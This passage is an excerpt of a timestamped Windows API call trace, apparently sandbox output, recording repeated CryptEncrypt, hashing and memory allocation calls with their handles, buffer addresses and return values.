(in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.804] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.805] malloc (_Size=0x1fd) returned 0x3df0420 [0142.805] free (_Block=0x0) [0142.805] free (_Block=0x3def558) [0142.806] malloc (_Size=0x1fd) returned 0x3def558 [0142.806] free (_Block=0x0) [0142.806] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.806] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.806] malloc (_Size=0x14) returned 0x3f65360 [0142.806] free (_Block=0x0) [0142.806] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x37dfacc) returned 1 [0142.806] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.806] free (_Block=0x3f65360) [0142.806] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.806] free (_Block=0x3def558) [0142.806] free (_Block=0x3def350) [0142.806] malloc (_Size=0x1fd) returned 0x3def350 [0142.806] free (_Block=0x0) [0142.806] malloc (_Size=0x1f2) returned 0x3def558 [0142.806] free (_Block=0x0) [0142.806] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.806] free (_Block=0x0) [0142.806] free (_Block=0x0) [0142.806] free (_Block=0x3def558) [0142.806] malloc (_Size=0x400) returned 0x60cfc0 [0142.806] free (_Block=0x0) [0142.807] free (_Block=0x60cdc0) [0142.807] free (_Block=0x3def350) [0142.807] free (_Block=0x3df0420) [0142.807] malloc (_Size=0x1fd) returned 0x3df0420 [0142.807] free (_Block=0x0) [0142.807] malloc (_Size=0x1fd) returned 0x3def350 [0142.807] free (_Block=0x0) [0142.807] free (_Block=0x0) [0142.807] free (_Block=0x3df0420) [0142.807] malloc (_Size=0x1fd) returned 0x3df0420 [0142.807] free (_Block=0x0) [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.807] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.808] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] malloc (_Size=0x1fd) returned 0x3def558 [0142.809] free (_Block=0x0) [0142.809] free (_Block=0x3def350) [0142.809] free (_Block=0x3df0420) [0142.809] malloc (_Size=0x1fd) returned 0x3def350 [0142.809] free (_Block=0x0) [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.809] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.810] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.811] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.811] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.811] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.811] malloc (_Size=0x1fd) returned 0x3df0420 [0142.811] free (_Block=0x0) [0142.811] free (_Block=0x3def558) [0142.811] malloc (_Size=0x1fd) returned 0x3def558 [0142.811] free (_Block=0x0) [0142.811] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.811] CryptHashData (hHash=0x4329b8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.811] malloc (_Size=0x14) returned 0x3f65280 [0142.811] free (_Block=0x0) [0142.811] CryptGetHashParam (in: hHash=0x4329b8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfacc) returned 1 [0142.811] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.811] free (_Block=0x3f65280) [0142.811] CryptDestroyHash (hHash=0x4329b8) returned 1 [0142.811] free (_Block=0x3def558) [0142.811] free (_Block=0x3def350) [0142.811] malloc (_Size=0x1fd) returned 0x3def350 [0142.811] free (_Block=0x0) [0142.811] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.811] free (_Block=0x0) [0142.811] malloc (_Size=0x1f2) returned 0x3def558 [0142.811] free (_Block=0x0) [0142.812] free (_Block=0x0) [0142.812] free (_Block=0x60cdc0) [0142.812] free (_Block=0x3def558) [0142.812] free (_Block=0x3def350) [0142.812] free (_Block=0x3df0420) [0142.812] malloc (_Size=0x1fd) returned 0x3df0420 [0142.812] free (_Block=0x0) [0142.812] malloc (_Size=0x1fd) returned 0x3def350 [0142.812] free (_Block=0x0) [0142.812] free (_Block=0x0) [0142.812] free (_Block=0x3df0420) [0142.812] malloc (_Size=0x1fd) returned 0x3df0420 [0142.812] free (_Block=0x0) [0142.812] 